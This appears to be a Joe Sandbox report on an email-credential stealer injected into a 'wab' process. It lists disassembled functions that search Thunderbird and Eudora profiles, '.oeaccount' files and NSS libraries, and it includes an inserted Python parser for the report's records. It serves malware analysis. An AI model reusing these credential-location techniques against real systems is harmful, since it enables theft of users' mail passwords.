                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• _memicmp.MSVCRT ref: 0040C00D
• memcpy.MSVCRT ref: 0040C024
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: F^@
• API String ID: 568519121-3652327722
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                                                                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                      • API String ID: 2773794195-880857682
                                                                                                                                                                                                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                                                                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%
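The per-function records in this listing (API ID, String ID, Opcode ID, Instruction ID, the two fuzzy hashes, the Memory Dump Source line and, for some functions, a flattened `control_flow_graph` line) are what an analyst pivots on when comparing this sample with other reports. The Python below is an added example, not part of the Joe Sandbox report or product: it parses that record layout into plain dicts so the fields can be indexed and compared. The section headings and field names are taken from the report as rendered here; the sample input is copied from two of the records on this page; the handling of the flattened CFG line assumes the layout seen in this report (node id, address range, API names with `* N` repeat counts, then `a->b` edges), which is an assumption about the export format, not documented behaviour.

```python
import re
from collections import defaultdict
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness", "Control-flow Graph"}
# e.g. "Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?), ref: 0040A87B"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

def parse_api_call(item):
    m = API_RE.match(item)
    if not m:                        # keep unexpected lines instead of silently dropping them
        return {"raw": item}
    d = m.groupdict()
    d["args"] = d["args"].split(",") if d["args"] else []
    return d

def split_id(value):
    """'API ID' and 'String ID' join several items with '$'."""
    return [p for p in value.split("$") if p]

def parse_cfg(line):
    """Flattened 'control_flow_graph <id> <range> <calls ...> <a>-><b> ...' line (assumed layout)."""
    nodes, edges, node, count_next = {}, [], None, False
    for tok in line.split()[1:]:
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif tok == "*":             # "memset * 4": a repeat count follows
            count_next = True
        elif count_next:
            node["calls"][-1][1] = int(tok)
            count_next = False
        elif node is not None and node["range"] is None:
            node["range"] = tok      # the address range directly follows the node id
        elif tok.isdigit():
            node = nodes.setdefault(int(tok), {"range": None, "calls": []})
        elif node is not None:
            node["calls"].append([tok, 1])
    return {"nodes": nodes, "edges": edges}

def parse_records(text):
    """One dict per function record; a record is closed by its 'Uniqueness Score' line."""
    records, cur, section = [], None, None
    for line in filter(None, map(str.strip, text.splitlines())):
        if cur is None:
            cur = {"apis": [], "strings": [], "similarity": {}, "source": {}, "cfg": None}
        if line in SECTIONS:
            section = line
        elif line.startswith("Uniqueness Score:"):
            cur["uniqueness_score"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            records.append(cur)
            cur, section = None, None
        elif section == "Control-flow Graph" and line.startswith("control_flow_graph"):
            cur["cfg"] = parse_cfg(line)
        elif line.startswith("•"):
            item = line[1:].strip()
            if section == "APIs":
                cur["apis"].append(parse_api_call(item))
            elif section == "Strings":
                cur["strings"].append(item)
            elif section == "Similarity":
                key, _, value = item.partition(":")
                cur["similarity"][key.strip()] = value.strip()
            elif section in ("Memory Dump Source", "Joe Sandbox IDA Plugin"):
                for part in item.split(", "):   # "Source File: x, Offset: y, based on PE: true"
                    key, _, value = part.partition(":")
                    cur["source"][key.strip()] = value.strip()
    if cur is not None:              # listing cut off before its 'Uniqueness Score' line
        records.append(cur)
    return records

def index_by(records, field):
    """Pivot: value of a Similarity field (e.g. 'Opcode ID') -> records sharing it."""
    idx = defaultdict(list)
    for r in records:
        if field in r["similarity"]:
            idx[r["similarity"][field]].append(r)
    return idx

# Sample input copied from two records of the report above (not constructed).
SAMPLE = """
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131
APIs
• GetComputerNameA.KERNEL32(?,?), ref: 0040810A
"""
```

`parse_records(SAMPLE)` yields two records; the second has no `uniqueness_score` because the sample, like the end of this listing, is cut off before that line. `index_by(records, "Opcode ID")` (or `"Instruction Fuzzy Hash"`) groups functions that share an identifier, which is the pivot used to match a function in a memory dump against functions seen in earlier reports. Malformed API lines are kept under a `raw` key rather than dropped, so a parse gap is visible instead of silent.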

Control-flow Graph
• Block 129: 408043-40818c (memset * 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar * 2, strlen * 2, memcpy)
• Block 130: 4081c2-4081c5
• Block 131: 40818e
• Block 132: 408194-40819d
• Block 133: 4081f6-4081fa
• Block 134: 4081c7-4081d0
• Block 135: 4081a4-4081c0
• Block 136: 40819f-4081a3
• Block 137: 4081d2-4081d6
• Block 138: 4081d7-4081f4
• Edges: 129->130, 129->131, 130->133, 130->134, 131->132, 132->135, 132->136, 134->137, 134->138, 135->130, 135->132, 136->135, 137->138, 138->133, 138->134
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                      • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                      • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                                                                                      Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 435 407cce-407cd3 433->435 436 407cd5-407d03 strlen * 2 434->436 437 407cc9 call 407d1f 434->437 435->436 439 407d18-407d1e 435->439 440 407d12 436->440 441 407d05-407d10 call 406e81 436->441 437->435 443 407d15-407d17 440->443 441->443 443->439
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
• FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
• strlen.MSVCRT ref: 00407CEB
• strlen.MSVCRT ref: 00407CF3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: .8D
• API String ID: 379999529-2881260426
• Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
• Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
• Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
• Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 00401E82
• strlen.MSVCRT ref: 00401E9B
• strlen.MSVCRT ref: 00401EA9
• strlen.MSVCRT ref: 00401EEF
• strlen.MSVCRT ref: 00401EFD
• memset.MSVCRT ref: 00401FA8
• atoi.MSVCRT ref: 00401FD7
• memset.MSVCRT ref: 00401FFA
• sprintf.MSVCRT ref: 00402027
  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
• memset.MSVCRT ref: 0040207D
• memset.MSVCRT ref: 00402092
• strlen.MSVCRT ref: 00402098
• strlen.MSVCRT ref: 004020A6
• strlen.MSVCRT ref: 004020D9
• strlen.MSVCRT ref: 004020E7
• memset.MSVCRT ref: 0040200F
  • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
  • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
• _mbscpy.MSVCRT ref: 0040216E
• RegCloseKey.ADVAPI32(00000000), ref: 00402178
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
  • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 1846531875-4223776976
• Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
• Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
• Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
• Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
  • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
  • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
  • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
• ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
• DeleteObject.GDI32(?), ref: 0040CEC8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
